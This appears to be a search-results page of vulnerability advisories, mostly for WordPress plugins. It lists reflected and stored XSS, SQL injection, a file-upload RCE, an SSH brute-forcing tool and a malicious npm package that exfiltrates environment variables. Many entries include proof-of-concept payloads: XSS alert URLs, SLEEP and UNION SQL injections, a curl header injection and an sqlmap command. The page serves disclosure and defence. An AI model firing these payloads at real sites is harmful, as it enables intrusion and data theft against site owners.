127 matches found
VikBooking < 1.5.9 - Reflected Cross-Site Scripting
The plugin does not escape the current URL before putting it back in a JavaScript context, leading to a Reflected Cross-Site Scripting https://example.com/wp-admin/?test%22-alert/XSS/-%22 https://example.com/wp-admin/profile.php?test%22-alert/XSS/-%22...
Wow Countdowns <= 3.1.2 - Admin+ SQLi
The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection. https://example.com/wp-admin/admin.php?page=mwp-countdown&info=del&did=1+AND+SELECT+5382+FROM+SELECTSLEEP5PpNt...
Give < 2.17.3 - Reflected Cross-Site Scripting via Donation Forms Dashboard
The plugin does not escape the s parameter before outputting it back in an attribute in the Donation Forms dashboard, leading to a Reflected Cross-Site Scripting...
Paid Memberships Pro < 2.6.7 - Unauthenticated Blind SQL Injection
The plugin does not escape the discountcode in one of its REST route available to unauthenticated users before using it in a SQL statement, leading to a SQL injection https://example.com/?restroute=/pmpro/v1/checkoutlevel&levelid=3&discountcode=%27%20%20union%20select%20sleep1%20--%20g...
NextScripts: Social Networks Auto-Poster < 4.3.24 - Unauthenticated Stored XSS
The plugin does not sanitise and escape logged requests before outputting them in the related admin dashboard, leading to an Unauthenticated Stored Cross-Site Scripting issue curl -H 'x-tomato: alert/XSS/;' 'https://example.com/?nxs-cronrun=yes' The XSS will be triggered in the Log/History...
Profile Extra Fields < 1.2.4 - Reflected Cross-Site Scripting
The plugin does not escape the role parameter when outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=profile-extra-fields.php&tab-action=userdata&role="alert/XSS/...
Login/Signup Popup < 2.2 - Reflected Cross-Site Scripting
The plugin does not escape its tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=xoo-el-fields&tab="alert/XSS/...
WooCommerce Products Table < 1.0.4 - Reflected Cross-Site Scripting
The plugin does not sanitise or escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting issues https://example.com/?woot-remote-page=alert/XSS-page/&anchor=1&width=alert/XSS-width/ https://example.com/?woot-remote-page=1&anchor=1&arbitrary=...
Contact Form Entries < 1.2.1 - Reflected Cross-Site Scripting
The plugin does not escape some of its filters before outputting them back in the admin dashboard, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?page=vxcfleads&tab=entries&startdate="alert/XSS-startdate/&enddate="alert/XSS-enddate/...
SMTP Mail < 1.2 - Reflected Cross-Site Scripting (XSS)
The plugin does not escape its page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...
Jock on air now < 5.6.2 - Reflected Cross-Site Scripting
The plugin does not escape the $SERVER'PHPSELF' before outputting it back in an attribute in its settings, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php/"alert/XSS//?page=joansettings...
Orbitaldump - A Simple Multi-Threaded Distributed SSH Brute-Forcing Tool Written In Python
A simple multi-threaded distributed SSH brute-forcing tool written in Python. How it Works When the script is executed without the --proxies switch, it acts just like any other multi-threaded SSH brute-forcing scripts. When the --proxies switch is added, the script pulls a list usually thousands ...
Simple Giveaways < 2.36.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS https://example.com/giveaway/mygiveaways/?share=%3Cscript%3Ealertdocument.domain%3C/script%3E...
Activity Log < 2.7.0 - Authenticated SQL Injection
The plugin was vulnerable to SQL Injection in the order column of the past events table. time curl 'http://www.example.com/wp-admin/admin.php?page=activitylogpage&orderby=histtime%20AND%20SLEEP%280%29' -H 'Cookie: ...'...
Goto < 2.1 - Unauthenticated Blind SQL Injection
The theme did not sanitise, validate of escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an Unauthenticated SQL injection issue sqlmap --url="https://example.com/tour-list/?keywords=13&startdate=13" --random-agent -dbs --level=3 --threads=4...
Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting (XSS)
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab=" onMouseOver="alert1;...
Event Banner <= 1.3 - Arbitrary File Upload to RCE
The plugin does not verify the uploaded image file, allowing admin accounts to upload arbitrary files, such as .exe, .php, or others executable, leading to RCE. Due to the lack of CSRF check, the issue can also be used via such vector to achieve the same result, or via a LFI as authorisation chec...
Modal Survey < 2.0.1.8.2 - Authenticated Reflected Cross-Site Scripting (XSS)
The plugin did not sanitise the msuid parameter from the survey participants page in the admin Dashboard, leading to a reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=modalsurveyparticipants&msuid=%27%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E...
Logitech: Host Header injection in oslo.io (using X-Forwarded-For header) leading to email spoofing
Hello team I hope it will be a happy year for you and for me 😇 Summary: I found Host Header injection in oslo.io I tried to use it to show the security effect on users And I found this Steps To Reproduce: 1. Well, first of all, enter your project 2.Make an invitation by email 3.Now through the...
Malicious Package in evil-package
All versions of evil-package contain malicious code. The package uploads the contents of process.env to example.com/log. Recommendation Remove the package from your environment. Given the host where the information was uploaded to there is no further indication of compromise...